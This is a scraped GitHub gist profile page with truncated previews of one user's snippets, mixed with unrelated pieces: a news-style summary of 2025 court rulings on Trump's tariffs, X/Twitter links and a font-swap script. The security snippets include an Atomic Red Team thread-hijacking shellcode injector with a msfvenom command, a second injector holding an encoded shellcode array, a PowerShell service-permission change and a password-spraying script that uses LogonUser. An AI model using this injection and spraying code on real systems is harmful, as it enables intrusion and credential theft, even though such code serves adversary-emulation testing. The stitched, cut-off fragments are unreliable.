Skip to content

Instantly share code, notes, and snippets.

View justaguywhocodes's full-sized avatar

Toussaint Louverture justaguywhocodes

View GitHub Profile
// Injector for Atomic Red Team leveraging thread context hijacking (T1055.003) to inject shellcode in Notepad.exe.
// Author: [email protected]
#include <windows.h>
#include <tlhelp32.h>
#include <iostream>
#include <string>
// msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Atomic Red Team" -f csharp
unsigned char shellcode[] = {
In 2025, court decisions significantly impacted Donald Trump's tariff policies, creating legal and economic challenges to his trade agenda. Here’s a concise overview of how these rulings affected his actions, based on available information:U.S. Court of International Trade Ruling (May 28, 2025):The U.S. Court of International Trade (CIT) unanimously ruled that Trump exceeded his authority under the International Emergency Economic Powers Act (IEEPA) by imposing broad "reciprocal" tariffs on virtually all U.S. trading partners, including a 10% universal tariff and higher levies on countries like China (20%), Canada, and Mexico (25%). The court also struck down tariffs justified by drug trafficking concerns, arguing they did not directly address the cited emergencies. The judges, appointed by Reagan, Obama, and Trump himself, found that IEEPA does not grant "unbounded tariff authority" and that Congress holds primary authority over trade. The court ordered a permanent injunction, halting these tariffs and requi
https://pbs.twimg.com/media/GvWahy0WcAAM5SR?format=jpg&name=large
$VarD=$null
$VarS=$null
$ResultsD=$null
$ResultsS=$null
$Service="mslldp"
$AddPermissions="(A;;CCLCSWLOCRRC;;;SU)"
$VarAccount="SU"
[string]$RawResults=sc.exe sdshow $Service
$RegexPatternALL='(D:)(\(.*\))(S:)(\(.*\))|(S:)(\(.*\))|(D:)(\(.*\))'
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
unsigned char shellcode[] = {
0x89, 0xe3, 0xd9, 0xe1, 0xd9, 0x73, 0xf4, 0x5d, 0x55, 0x59, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x37, 0x51, 0x5a, 0x6a, 0x41, 0x58, 0x50, 0x30, 0x41, 0x30, 0x41, 0x6b, 0x41, 0x41, 0x51, 0x32, 0x41, 0x42, 0x32, 0x42, 0x42, 0x30, 0x42, 0x42, 0x41, 0x42, 0x58, 0x50, 0x38, 0x41, 0x42, 0x75, 0x4a, 0x49, 0x79, 0x6c, 0x68, 0x68, 0x6e, 0x62, 0x43, 0x30, 0x35, 0x50, 0x77, 0x70, 0x65, 0x30, 0x6c, 0x49, 0x78, 0x65, 0x50, 0x31, 0x6b, 0x70, 0x35, 0x34, 0x6c, 0x4b, 0x50, 0x50, 0x36, 0x50, 0x4c, 0x4b, 0x32, 0x72, 0x74, 0x4c, 0x6c, 0x4b, 0x30, 0x52, 0x62, 0x34, 0x6c, 0x4b, 0x63, 0x42, 0x51, 0x38, 0x74, 0x4f, 0x78, 0x37, 0x42, 0x6a, 0x37, 0x56, 0x74, 0x71, 0x69, 0x6f, 0x4c, 0x6c, 0x55, 0x6c, 0x71, 0x71, 0x63, 0x4c, 0x56, 0x62, 0x44, 0x6c, 0x71, 0x30, 0x79, 0x51, 0x38, 0x4f, 0x64, 0x4d, 0x75, 0x51, 0x6b, 0x77, 0x7a, 0x42, 0x38, 0x72, 0x50, 0x52, 0x51, 0x47
https://x.com/CollinRugg/status/1932859224452968532
# Parameters
param (
[Parameter(Mandatory=$true)]
[string]$FilePath,
[Parameter(Mandatory=$true)]
[string]$OriginalFont,
[Parameter(Mandatory=$true)]
[string]$NewFont
https://x.com/stephenm/status/1932057977793470965?s=46
# PowerShell script to test login attempts for multiple usernames with a given password
# Define the list of usernames to test
$usernames = @("user1", "user2", "user3") # Replace with actual usernames
$password = "YourPasswordHere" # Replace with the password to test
$computerName = "." # Use "." for the local machine, or specify a remote computer name
# Function to test credentials using LogonUser API
Add-Type -TypeDefinition @"
using System;
https://x.com/jacobtheclipper/status/1929623151648165952?s=46